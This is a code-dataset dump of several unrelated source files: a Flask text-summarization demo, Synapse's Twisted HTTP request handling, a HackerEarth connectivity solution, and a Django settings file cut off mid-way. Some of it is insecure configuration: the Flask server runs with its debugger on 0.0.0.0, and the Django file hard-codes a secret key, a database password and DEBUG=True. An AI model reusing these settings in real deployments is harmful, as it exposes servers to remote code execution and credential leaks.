|
WebDemo/flask_app/main.py
|
silenceliang/CascadingAgentsHybridSum
|
6c127df51bd8cc926878f62ebdb66bc1042bb58c
|
[
"MIT"
] | null | null | null |
WebDemo/flask_app/main.py
|
silenceliang/CascadingAgentsHybridSum
|
6c127df51bd8cc926878f62ebdb66bc1042bb58c
|
[
"MIT"
] | null | null | null |
from flask import render_template, request
from flask_script import Manager, Server
from app import app
from model import Content, Summary, Article
import app.static.summ as summarizationModel
import os, json, logging
@app.route('/', endpoint='ACCESS')
@app.route('/index.html', endpoint='ACCESSFILE')
def index():
    """Render the landing page with every stored article/summary pair."""
    try:
        all_pairs = Article.objects.all()
        return render_template('index.html', history=all_pairs)
    except Exception as e:
        logging.error(e)
        # Bare raise re-raises with the original traceback intact.
        raise
@app.route('/run_decode', methods=['POST'])
def run_decode():
    """Summarize the POSTed 'source' text with the pretrained model and
    persist the (article, abstract) pair best-effort."""
    logging.debug('decode your input by our pretrained model')
    try:
        source = request.get_json()['source']  # raw text from the frontend
        logging.debug('input: {}'.format(source))
    except Exception:
        # Missing or malformed JSON payload.
        message = {'message' : 'Fail to catch the data from client.'}
        return json.dumps(message)
    try:
        logging.debug('using the pretrained model.')
        sentNums, summary = summarizationModel.decode.run_(source)
    except Exception as e:
        # Previously this path fell through and returned None (a 500 with
        # no body); report the failure to the client instead.
        logging.error(e)
        return json.dumps({'message': 'Summarization failed.'})
    logging.debug('The number of sentences is {}'.format(sentNums))
    logging.debug('The abstract is that {}'.format(summary))
    results = {'sent_no': sentNums, 'final': summary}
    try:
        article = Content(text=source)
        abstract = Summary(text=summary)
        pair = Article(article=article.id, abstract=abstract.id)
        article.save()
        abstract.save()
        pair.save()
    except Exception as e:
        # Persistence is best-effort; still return the summary.
        logging.error(e)
    return json.dumps(results)
# Expose `python main.py runserver` with debugger/auto-reload enabled;
# host and port come from the environment (defaults: 0.0.0.0:5001).
manager = Manager(app)
manager.add_command('runserver', Server(
    use_debugger = True,
    use_reloader = True,
    host = os.getenv('IP', '0.0.0.0'),
    port = int(os.getenv('PORT', 5001))
))
if __name__ == "__main__":
    manager.run()
| 32.311475
| 94
| 0.624049
|
from flask import render_template, request
from flask_script import Manager, Server
from app import app
from model import Content, Summary, Article
import app.static.summ as summarizationModel
import os, json, logging
@app.route('/', endpoint='ACCESS')
@app.route('/index.html', endpoint='ACCESSFILE')
def index():
    """Render the landing page with every stored article/summary pair."""
    try:
        all_pairs = Article.objects.all()
        return render_template('index.html', history=all_pairs)
    except Exception as e:
        logging.error(e)
        # Bare raise re-raises with the original traceback intact.
        raise
@app.route('/run_decode', methods=['POST'])
def run_decode():
    """Summarize the POSTed 'source' text with the pretrained model and
    persist the (article, abstract) pair best-effort."""
    logging.debug('decode your input by our pretrained model')
    try:
        source = request.get_json()['source']  # raw text from the frontend
        logging.debug('input: {}'.format(source))
    except Exception:
        # Missing or malformed JSON payload.
        message = {'message' : 'Fail to catch the data from client.'}
        return json.dumps(message)
    try:
        logging.debug('using the pretrained model.')
        sentNums, summary = summarizationModel.decode.run_(source)
    except Exception as e:
        # Previously this path fell through and returned None (a 500 with
        # no body); report the failure to the client instead.
        logging.error(e)
        return json.dumps({'message': 'Summarization failed.'})
    logging.debug('The number of sentences is {}'.format(sentNums))
    logging.debug('The abstract is that {}'.format(summary))
    results = {'sent_no': sentNums, 'final': summary}
    try:
        article = Content(text=source)
        abstract = Summary(text=summary)
        pair = Article(article=article.id, abstract=abstract.id)
        article.save()
        abstract.save()
        pair.save()
    except Exception as e:
        # Persistence is best-effort; still return the summary.
        logging.error(e)
    return json.dumps(results)
# Expose `python main.py runserver` with debugger/auto-reload enabled;
# host and port come from the environment (defaults: 0.0.0.0:5001).
manager = Manager(app)
manager.add_command('runserver', Server(
    use_debugger = True,
    use_reloader = True,
    host = os.getenv('IP', '0.0.0.0'),
    port = int(os.getenv('PORT', 5001))
))
if __name__ == "__main__":
    manager.run()
| true
| true
|
f705abab94d05422bd97d62349625cd2fa0906e4
| 15,678
|
py
|
Python
|
synapse/http/server.py
|
theworldbright/synapse
|
6783534a0f9f34d6972a31af368ee2324e2033f3
|
[
"Apache-2.0"
] | null | null | null |
synapse/http/server.py
|
theworldbright/synapse
|
6783534a0f9f34d6972a31af368ee2324e2033f3
|
[
"Apache-2.0"
] | null | null | null |
synapse/http/server.py
|
theworldbright/synapse
|
6783534a0f9f34d6972a31af368ee2324e2033f3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.api.errors import (
cs_exception, SynapseError, CodeMessageException, UnrecognizedRequestError, Codes
)
from synapse.util.logcontext import LoggingContext, PreserveLoggingContext
from synapse.util.caches import intern_dict
import synapse.metrics
import synapse.events
from canonicaljson import (
encode_canonical_json, encode_pretty_printed_json
)
from twisted.internet import defer
from twisted.web import server, resource
from twisted.web.server import NOT_DONE_YET
from twisted.web.util import redirectTo
import collections
import logging
import urllib
import ujson
logger = logging.getLogger(__name__)
metrics = synapse.metrics.get_metrics_for(__name__)
# Counters for requests in / responses out, labelled by HTTP method plus
# servlet class name and logging-context tag (requests) or response code.
incoming_requests_counter = metrics.register_counter(
    "requests",
    labels=["method", "servlet", "tag"],
)
outgoing_responses_counter = metrics.register_counter(
    "responses",
    labels=["method", "code"],
)
# Distributions tracking wall-clock latency and per-request resource usage
# (CPU user/system time, DB transaction count and total duration).
response_timer = metrics.register_distribution(
    "response_time",
    labels=["method", "servlet", "tag"]
)
response_ru_utime = metrics.register_distribution(
    "response_ru_utime", labels=["method", "servlet", "tag"]
)
response_ru_stime = metrics.register_distribution(
    "response_ru_stime", labels=["method", "servlet", "tag"]
)
response_db_txn_count = metrics.register_distribution(
    "response_db_txn_count", labels=["method", "servlet", "tag"]
)
response_db_txn_duration = metrics.register_distribution(
    "response_db_txn_duration", labels=["method", "servlet", "tag"]
)
# Monotonically increasing id used to tag each incoming request in logs.
_next_request_id = 0
def request_handler(report_metrics=True):
    """Decorator factory for ``wrap_request_handler``.

    Returns a decorator that wraps a handler method with logging,
    exception handling and (optionally) metric reporting.
    """
    def decorator(handler):
        return wrap_request_handler(handler, report_metrics)
    return decorator
def wrap_request_handler(request_handler, report_metrics):
    """Wraps a method that acts as a request handler with the necessary logging
    and exception handling.

    The method must have a signature of "handle_foo(self, request)". The
    argument "self" must have "version_string" and "clock" attributes. The
    argument "request" must be a twisted HTTP request.

    The method must return a deferred. If the deferred succeeds we assume that
    a response has been sent. If the deferred fails with a SynapseError we use
    it to send a JSON response with the appropriate HTTP response code. If the
    deferred fails with any other type of error we send a 500 response.

    We insert a unique request-id into the logging context for this request and
    log the response and duration for this request.
    """

    @defer.inlineCallbacks
    def wrapped_request_handler(self, request):
        global _next_request_id
        request_id = "%s-%s" % (request.method, _next_request_id)
        _next_request_id += 1

        with LoggingContext(request_id) as request_context:
            if report_metrics:
                request_metrics = RequestMetrics()
                request_metrics.start(self.clock)

            request_context.request = request_id
            with request.processing():
                try:
                    with PreserveLoggingContext(request_context):
                        yield request_handler(self, request)
                except CodeMessageException as e:
                    code = e.code
                    if isinstance(e, SynapseError):
                        logger.info(
                            "%s SynapseError: %s - %s", request, code, e.msg
                        )
                    else:
                        logger.exception(e)
                    outgoing_responses_counter.inc(request.method, str(code))
                    respond_with_json(
                        request, code, cs_exception(e), send_cors=True,
                        pretty_print=_request_user_agent_is_curl(request),
                        version_string=self.version_string,
                    )
                except Exception:
                    # Narrowed from a bare ``except:`` so KeyboardInterrupt
                    # and SystemExit are not converted into 500 responses.
                    logger.exception(
                        "Failed handle request %s.%s on %r: %r",
                        request_handler.__module__,
                        request_handler.__name__,
                        self,
                        request
                    )
                    respond_with_json(
                        request,
                        500,
                        {
                            "error": "Internal server error",
                            "errcode": Codes.UNKNOWN,
                        },
                        send_cors=True
                    )
                finally:
                    try:
                        if report_metrics:
                            request_metrics.stop(
                                self.clock, request, self.__class__.__name__
                            )
                    except Exception:
                        # Metric failures must never mask the response path,
                        # but only real exceptions are swallowed here.
                        pass
    return wrapped_request_handler
class HttpServer(object):
    """ Interface for registering callbacks on a HTTP server
    """
    def register_paths(self, method, path_patterns, callback):
        """ Register a callback that gets fired if we receive a http request
        with the given method for a path that matches the given regex.
        If the regex contains groups these gets passed to the callback via
        an unpacked tuple.
        Args:
            method (str): The method to listen to.
            path_patterns (list<SRE_Pattern>): The regex used to match requests.
            callback (function): The function to fire if we receive a matched
                request. The first argument will be the request object and
                subsequent arguments will be any matched groups from the regex.
                This should return a tuple of (code, response).
        """
        # Intentionally a no-op: concrete servers override this.
        pass
class JsonResource(HttpServer, resource.Resource):
    """ This implements the HttpServer interface and provides JSON support for
    Resources.

    Register callbacks via register_paths()

    Callbacks can return a tuple of status code and a dict in which case the
    dict will automatically be sent to the client as a JSON object.

    The JsonResource is primarily intended for returning JSON, but callbacks
    may send something other than JSON, they may do so by using the methods
    on the request object and instead returning None.
    """

    isLeaf = True

    _PathEntry = collections.namedtuple("_PathEntry", ["pattern", "callback"])

    def __init__(self, hs, canonical_json=True):
        resource.Resource.__init__(self)

        self.canonical_json = canonical_json
        self.clock = hs.get_clock()
        self.path_regexs = {}
        self.version_string = hs.version_string
        self.hs = hs

    def register_paths(self, method, path_patterns, callback):
        for path_pattern in path_patterns:
            self.path_regexs.setdefault(method, []).append(
                self._PathEntry(path_pattern, callback)
            )

    def render(self, request):
        """ This gets called by twisted every time someone sends us a request.
        """
        self._async_render(request)
        return server.NOT_DONE_YET

    # Disable metric reporting because _async_render does its own metrics.
    # It does its own metric reporting because _async_render dispatches to
    # a callback and it's the class name of that callback we want to report
    # against rather than the JsonResource itself.
    @request_handler(report_metrics=False)
    @defer.inlineCallbacks
    def _async_render(self, request):
        """ This gets called from render() every time someone sends us a request.
            This checks if anyone has registered a callback for that method and
            path.
        """
        if request.method == "OPTIONS":
            self._send_response(request, 200, {})
            return

        request_metrics = RequestMetrics()
        request_metrics.start(self.clock)

        # Loop through all the registered callbacks to check if the method
        # and path regex match
        for path_entry in self.path_regexs.get(request.method, []):
            m = path_entry.pattern.match(request.path)
            if not m:
                continue

            # We found a match! Trigger callback and then return the
            # returned response. We pass both the request and any
            # matched groups from the regex to the callback.

            callback = path_entry.callback

            servlet_instance = getattr(callback, "__self__", None)
            if servlet_instance is not None:
                servlet_classname = servlet_instance.__class__.__name__
            else:
                servlet_classname = "%r" % callback

            kwargs = intern_dict({
                name: urllib.unquote(value).decode("UTF-8") if value else value
                for name, value in m.groupdict().items()
            })

            callback_return = yield callback(request, **kwargs)
            if callback_return is not None:
                code, response = callback_return
                self._send_response(request, code, response)

            try:
                request_metrics.stop(self.clock, request, servlet_classname)
            except Exception:
                # Narrowed from a bare except: metric failures are
                # non-fatal, but SystemExit/KeyboardInterrupt must not be
                # swallowed here.
                pass

            return

        # Huh. No one wanted to handle that? Fiiiiiine. Send 400.
        raise UnrecognizedRequestError()

    def _send_response(self, request, code, response_json_object,
                       response_code_message=None):
        # could alternatively use request.notifyFinish() and flip a flag when
        # the Deferred fires, but since the flag is RIGHT THERE it seems like
        # a waste.
        if request._disconnected:
            logger.warn(
                "Not sending response to request %s, already disconnected.",
                request)
            return

        outgoing_responses_counter.inc(request.method, str(code))

        # TODO: Only enable CORS for the requests that need it.
        respond_with_json(
            request, code, response_json_object,
            send_cors=True,
            response_code_message=response_code_message,
            pretty_print=_request_user_agent_is_curl(request),
            version_string=self.version_string,
            canonical_json=self.canonical_json,
        )
class RequestMetrics(object):
    """Records per-request timing/resource metrics between start() and stop()."""

    def start(self, clock):
        # Store under a name distinct from the method: the old
        # ``self.start = clock.time_msec()`` shadowed the bound start()
        # method on the instance after the first call.
        self.start_time = clock.time_msec()
        self.start_context = LoggingContext.current_context()

    def stop(self, clock, request, servlet_classname):
        context = LoggingContext.current_context()

        tag = ""
        if context:
            tag = context.tag

            if context != self.start_context:
                # A changed context means the resource counters below would
                # be attributed to the wrong request; bail out.
                logger.warn(
                    "Context have unexpectedly changed %r, %r",
                    context, self.start_context
                )
                return

        incoming_requests_counter.inc(request.method, servlet_classname, tag)

        response_timer.inc_by(
            clock.time_msec() - self.start_time, request.method,
            servlet_classname, tag
        )

        ru_utime, ru_stime = context.get_resource_usage()

        response_ru_utime.inc_by(
            ru_utime, request.method, servlet_classname, tag
        )
        response_ru_stime.inc_by(
            ru_stime, request.method, servlet_classname, tag
        )
        response_db_txn_count.inc_by(
            context.db_txn_count, request.method, servlet_classname, tag
        )
        response_db_txn_duration.inc_by(
            context.db_txn_duration, request.method, servlet_classname, tag
        )
class RootRedirect(resource.Resource):
    """Redirects the root '/' path to another path."""

    def __init__(self, path):
        resource.Resource.__init__(self)
        self.url = path

    def render_GET(self, request):
        return redirectTo(self.url, request)

    def getChild(self, name, request):
        # An empty name means the root itself; any other name is resolved
        # through the default Resource child lookup.
        if name:
            return resource.Resource.getChild(self, name, request)
        return self
def respond_with_json(request, code, json_object, send_cors=False,
                      response_code_message=None, pretty_print=False,
                      version_string="", canonical_json=True):
    """Encode `json_object` and send it as the response body for `request`.

    Chooses pretty-printed, canonical, or plain ujson encoding, then
    delegates the actual sending to respond_with_json_bytes.
    """
    if pretty_print:
        json_bytes = encode_pretty_printed_json(json_object) + "\n"
    elif canonical_json or synapse.events.USE_FROZEN_DICTS:
        # Canonical encoding also copes with frozen_dicts, which plain
        # ujson does not.
        json_bytes = encode_canonical_json(json_object)
    else:
        json_bytes = ujson.dumps(json_object, ensure_ascii=False)

    return respond_with_json_bytes(
        request, code, json_bytes,
        send_cors=send_cors,
        response_code_message=response_code_message,
        version_string=version_string
    )
def respond_with_json_bytes(request, code, json_bytes, send_cors=False,
                            version_string="", response_code_message=None):
    """Write already-encoded JSON bytes as the response to `request`.

    Sets the response code and the standard JSON headers, optionally adds
    permissive CORS headers, writes the body and finishes the request.

    Args:
        request (twisted.web.http.Request): The http request to respond to.
        code (int): The HTTP response code.
        json_bytes (bytes): The json bytes to use as the response body.
        send_cors (bool): Whether to send Cross-Origin Resource Sharing
            headers (http://www.w3.org/TR/cors/).
    Returns:
        twisted.web.server.NOT_DONE_YET
    """
    request.setResponseCode(code, message=response_code_message)

    for header, value in (
        (b"Content-Type", b"application/json"),
        (b"Server", version_string),
        (b"Content-Length", b"%d" % (len(json_bytes),)),
    ):
        request.setHeader(header, value)

    if send_cors:
        for header, value in (
            ("Access-Control-Allow-Origin", "*"),
            ("Access-Control-Allow-Methods",
             "GET, POST, PUT, DELETE, OPTIONS"),
            ("Access-Control-Allow-Headers",
             "Origin, X-Requested-With, Content-Type, Accept"),
        ):
            request.setHeader(header, value)

    request.write(json_bytes)
    finish_request(request)
    return NOT_DONE_YET
def finish_request(request):
    """Complete the response for `request`, tolerating closed connections.

    Twisted raises a RuntimeError if the connection was closed before the
    response was written, and provides no convenient or reliable way to
    check for that in advance: the deferred from ``request.notifyFinish``
    never fires if the connection is already gone, so it would have to be
    hooked up at the very start of the request — too late by the time we
    want to write the response. Instead we just catch and log the error.
    """
    try:
        request.finish()
    except RuntimeError as e:
        logger.info("Connection disconnected before response was written: %r", e)
def _request_user_agent_is_curl(request):
user_agents = request.requestHeaders.getRawHeaders(
"User-Agent", default=[]
)
for user_agent in user_agents:
if "curl" in user_agent:
return True
return False
| 36.124424
| 88
| 0.637518
|
from synapse.api.errors import (
cs_exception, SynapseError, CodeMessageException, UnrecognizedRequestError, Codes
)
from synapse.util.logcontext import LoggingContext, PreserveLoggingContext
from synapse.util.caches import intern_dict
import synapse.metrics
import synapse.events
from canonicaljson import (
encode_canonical_json, encode_pretty_printed_json
)
from twisted.internet import defer
from twisted.web import server, resource
from twisted.web.server import NOT_DONE_YET
from twisted.web.util import redirectTo
import collections
import logging
import urllib
import ujson
logger = logging.getLogger(__name__)
metrics = synapse.metrics.get_metrics_for(__name__)
incoming_requests_counter = metrics.register_counter(
"requests",
labels=["method", "servlet", "tag"],
)
outgoing_responses_counter = metrics.register_counter(
"responses",
labels=["method", "code"],
)
response_timer = metrics.register_distribution(
"response_time",
labels=["method", "servlet", "tag"]
)
response_ru_utime = metrics.register_distribution(
"response_ru_utime", labels=["method", "servlet", "tag"]
)
response_ru_stime = metrics.register_distribution(
"response_ru_stime", labels=["method", "servlet", "tag"]
)
response_db_txn_count = metrics.register_distribution(
"response_db_txn_count", labels=["method", "servlet", "tag"]
)
response_db_txn_duration = metrics.register_distribution(
"response_db_txn_duration", labels=["method", "servlet", "tag"]
)
_next_request_id = 0
def request_handler(report_metrics=True):
return lambda request_handler: wrap_request_handler(request_handler, report_metrics)
def wrap_request_handler(request_handler, report_metrics):
@defer.inlineCallbacks
def wrapped_request_handler(self, request):
global _next_request_id
request_id = "%s-%s" % (request.method, _next_request_id)
_next_request_id += 1
with LoggingContext(request_id) as request_context:
if report_metrics:
request_metrics = RequestMetrics()
request_metrics.start(self.clock)
request_context.request = request_id
with request.processing():
try:
with PreserveLoggingContext(request_context):
yield request_handler(self, request)
except CodeMessageException as e:
code = e.code
if isinstance(e, SynapseError):
logger.info(
"%s SynapseError: %s - %s", request, code, e.msg
)
else:
logger.exception(e)
outgoing_responses_counter.inc(request.method, str(code))
respond_with_json(
request, code, cs_exception(e), send_cors=True,
pretty_print=_request_user_agent_is_curl(request),
version_string=self.version_string,
)
except:
logger.exception(
"Failed handle request %s.%s on %r: %r",
request_handler.__module__,
request_handler.__name__,
self,
request
)
respond_with_json(
request,
500,
{
"error": "Internal server error",
"errcode": Codes.UNKNOWN,
},
send_cors=True
)
finally:
try:
if report_metrics:
request_metrics.stop(
self.clock, request, self.__class__.__name__
)
except:
pass
return wrapped_request_handler
class HttpServer(object):
def register_paths(self, method, path_patterns, callback):
pass
class JsonResource(HttpServer, resource.Resource):
isLeaf = True
_PathEntry = collections.namedtuple("_PathEntry", ["pattern", "callback"])
def __init__(self, hs, canonical_json=True):
resource.Resource.__init__(self)
self.canonical_json = canonical_json
self.clock = hs.get_clock()
self.path_regexs = {}
self.version_string = hs.version_string
self.hs = hs
def register_paths(self, method, path_patterns, callback):
for path_pattern in path_patterns:
self.path_regexs.setdefault(method, []).append(
self._PathEntry(path_pattern, callback)
)
def render(self, request):
self._async_render(request)
return server.NOT_DONE_YET
# against rather than the JsonResource itself.
@request_handler(report_metrics=False)
@defer.inlineCallbacks
def _async_render(self, request):
if request.method == "OPTIONS":
self._send_response(request, 200, {})
return
request_metrics = RequestMetrics()
request_metrics.start(self.clock)
# Loop through all the registered callbacks to check if the method
# and path regex match
for path_entry in self.path_regexs.get(request.method, []):
m = path_entry.pattern.match(request.path)
if not m:
continue
# We found a match! Trigger callback and then return the
# returned response. We pass both the request and any
# matched groups from the regex to the callback.
callback = path_entry.callback
servlet_instance = getattr(callback, "__self__", None)
if servlet_instance is not None:
servlet_classname = servlet_instance.__class__.__name__
else:
servlet_classname = "%r" % callback
kwargs = intern_dict({
name: urllib.unquote(value).decode("UTF-8") if value else value
for name, value in m.groupdict().items()
})
callback_return = yield callback(request, **kwargs)
if callback_return is not None:
code, response = callback_return
self._send_response(request, code, response)
try:
request_metrics.stop(self.clock, request, servlet_classname)
except:
pass
return
# Huh. No one wanted to handle that? Fiiiiiine. Send 400.
raise UnrecognizedRequestError()
def _send_response(self, request, code, response_json_object,
response_code_message=None):
# could alternatively use request.notifyFinish() and flip a flag when
# the Deferred fires, but since the flag is RIGHT THERE it seems like
# a waste.
if request._disconnected:
logger.warn(
"Not sending response to request %s, already disconnected.",
request)
return
outgoing_responses_counter.inc(request.method, str(code))
# TODO: Only enable CORS for the requests that need it.
respond_with_json(
request, code, response_json_object,
send_cors=True,
response_code_message=response_code_message,
pretty_print=_request_user_agent_is_curl(request),
version_string=self.version_string,
canonical_json=self.canonical_json,
)
class RequestMetrics(object):
def start(self, clock):
self.start = clock.time_msec()
self.start_context = LoggingContext.current_context()
def stop(self, clock, request, servlet_classname):
context = LoggingContext.current_context()
tag = ""
if context:
tag = context.tag
if context != self.start_context:
logger.warn(
"Context have unexpectedly changed %r, %r",
context, self.start_context
)
return
incoming_requests_counter.inc(request.method, servlet_classname, tag)
response_timer.inc_by(
clock.time_msec() - self.start, request.method,
servlet_classname, tag
)
ru_utime, ru_stime = context.get_resource_usage()
response_ru_utime.inc_by(
ru_utime, request.method, servlet_classname, tag
)
response_ru_stime.inc_by(
ru_stime, request.method, servlet_classname, tag
)
response_db_txn_count.inc_by(
context.db_txn_count, request.method, servlet_classname, tag
)
response_db_txn_duration.inc_by(
context.db_txn_duration, request.method, servlet_classname, tag
)
class RootRedirect(resource.Resource):
def __init__(self, path):
resource.Resource.__init__(self)
self.url = path
def render_GET(self, request):
return redirectTo(self.url, request)
def getChild(self, name, request):
if len(name) == 0:
return self # select ourselves as the child to render
return resource.Resource.getChild(self, name, request)
def respond_with_json(request, code, json_object, send_cors=False,
response_code_message=None, pretty_print=False,
version_string="", canonical_json=True):
if pretty_print:
json_bytes = encode_pretty_printed_json(json_object) + "\n"
else:
if canonical_json or synapse.events.USE_FROZEN_DICTS:
json_bytes = encode_canonical_json(json_object)
else:
# ujson doesn't like frozen_dicts.
json_bytes = ujson.dumps(json_object, ensure_ascii=False)
return respond_with_json_bytes(
request, code, json_bytes,
send_cors=send_cors,
response_code_message=response_code_message,
version_string=version_string
)
def respond_with_json_bytes(request, code, json_bytes, send_cors=False,
version_string="", response_code_message=None):
request.setResponseCode(code, message=response_code_message)
request.setHeader(b"Content-Type", b"application/json")
request.setHeader(b"Server", version_string)
request.setHeader(b"Content-Length", b"%d" % (len(json_bytes),))
if send_cors:
request.setHeader("Access-Control-Allow-Origin", "*")
request.setHeader("Access-Control-Allow-Methods",
"GET, POST, PUT, DELETE, OPTIONS")
request.setHeader("Access-Control-Allow-Headers",
"Origin, X-Requested-With, Content-Type, Accept")
request.write(json_bytes)
finish_request(request)
return NOT_DONE_YET
def finish_request(request):
try:
request.finish()
except RuntimeError as e:
logger.info("Connection disconnected before response was written: %r", e)
def _request_user_agent_is_curl(request):
user_agents = request.requestHeaders.getRawHeaders(
"User-Agent", default=[]
)
for user_agent in user_agents:
if "curl" in user_agent:
return True
return False
| true
| true
|
f705ae64cdecffa5cafbe9b36e37245e035fb0b5
| 1,380
|
py
|
Python
|
hackerearth/Algorithms/Feasible relations/solution.py
|
ATrain951/01.python-com_Qproject
|
c164dd093954d006538020bdf2e59e716b24d67c
|
[
"MIT"
] | 4
|
2020-07-24T01:59:50.000Z
|
2021-07-24T15:14:08.000Z
|
hackerearth/Algorithms/Feasible relations/solution.py
|
ATrain951/01.python-com_Qproject
|
c164dd093954d006538020bdf2e59e716b24d67c
|
[
"MIT"
] | null | null | null |
hackerearth/Algorithms/Feasible relations/solution.py
|
ATrain951/01.python-com_Qproject
|
c164dd093954d006538020bdf2e59e716b24d67c
|
[
"MIT"
] | null | null | null |
"""
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
from collections import deque, defaultdict
from sys import stdin
def check_connected(x, connected, adjacency):
    """Flood-fill from node `x`, labelling every reachable node with `x`.

    `connected` maps node -> component representative and is updated in
    place; `adjacency` maps node -> iterable of neighbouring nodes.
    """
    pending = deque([x])
    while pending:
        node = pending.pop()
        for neighbour in adjacency[node]:
            if neighbour not in connected:
                connected[neighbour] = x
                pending.append(neighbour)
# For each test case: build an undirected graph from the '=' relations,
# label its connected components with a DFS flood-fill, and then verify
# that no '!=' relation joins two variables in the same component.
t = int(stdin.readline())
for _ in range(t):
    n, k = map(int, stdin.readline().strip().split())
    equalities = defaultdict(set)   # adjacency list of '=' edges
    inequalities = []               # pairs that must end up in different components
    for _ in range(k):
        x1, r, x2 = stdin.readline().strip().split()
        x1 = int(x1)
        x2 = int(x2)
        if r == '=':
            equalities[x1].add(x2)
            equalities[x2].add(x1)
        else:
            inequalities.append((x1, x2))
    # Map each variable to its component representative; only start a new
    # flood-fill from nodes not already claimed by an earlier component.
    connected_components = {}
    for i in range(1, n + 1):
        if i not in connected_components:
            connected_components[i] = i
            check_connected(i, connected_components, equalities)
    # for/else: the else runs only when no inequality was violated.
    for x1, x2 in inequalities:
        if connected_components[x1] == connected_components[x2]:
            print('NO')
            break
    else:
        print('YES')
| 27.6
| 94
| 0.571739
|
from collections import deque, defaultdict
from sys import stdin
def check_connected(x, connected, adjacency):
stack = deque([x])
while stack:
u = stack.pop()
for v in adjacency[u]:
if v not in connected:
connected[v] = x
stack.append(v)
t = int(stdin.readline())
for _ in range(t):
n, k = map(int, stdin.readline().strip().split())
equalities = defaultdict(set)
inequalities = []
for _ in range(k):
x1, r, x2 = stdin.readline().strip().split()
x1 = int(x1)
x2 = int(x2)
if r == '=':
equalities[x1].add(x2)
equalities[x2].add(x1)
else:
inequalities.append((x1, x2))
connected_components = {}
for i in range(1, n + 1):
if i not in connected_components:
connected_components[i] = i
check_connected(i, connected_components, equalities)
for x1, x2 in inequalities:
if connected_components[x1] == connected_components[x2]:
print('NO')
break
else:
print('YES')
| true
| true
|
f705ae9c256c532814c09ac996b19cab9acfb4e3
| 2,527
|
py
|
Python
|
old/apply/apply/settings.py
|
neonsoftware/yard
|
5f2fda72c7a3f330d2442002687ff4d1dfb21680
|
[
"MIT"
] | 1
|
2015-03-11T07:43:09.000Z
|
2015-03-11T07:43:09.000Z
|
old/apply/apply/settings.py
|
neonsoftware/yard
|
5f2fda72c7a3f330d2442002687ff4d1dfb21680
|
[
"MIT"
] | 5
|
2015-05-17T18:22:29.000Z
|
2015-08-15T17:27:03.000Z
|
old/apply/apply/settings.py
|
neonsoftware/yard
|
5f2fda72c7a3f330d2442002687ff4d1dfb21680
|
[
"MIT"
] | null | null | null |
"""
Django settings for apply project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; it should be
# rotated and loaded from the environment before any production use.
SECRET_KEY = '--v$_^*0r5(ok1^2sxdm4w_wwskvuv-z0tcop+yf1-m@+7p#5i'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True

# NOTE(review): an empty ALLOWED_HOSTS is only usable while DEBUG is True;
# production deployments must list their hostnames here.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'gunicorn',
'bootstrapform',
'yard',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'apply.urls'
WSGI_APPLICATION = 'apply.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'yard', # Or path to database file if using sqlite3.
'USER': 'frankie', # Not used with sqlite3.
'PASSWORD': 'frankie', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
DOCS_URL = BASE_DIR + '/yard/static/docs/'
LOGGING = {
'version': 1,
}
LOGIN_REDIRECT_URL="/"
| 25.019802
| 103
| 0.688564
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = '--v$_^*0r5(ok1^2sxdm4w_wwskvuv-z0tcop+yf1-m@+7p#5i'
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'gunicorn',
'bootstrapform',
'yard',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'apply.urls'
WSGI_APPLICATION = 'apply.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
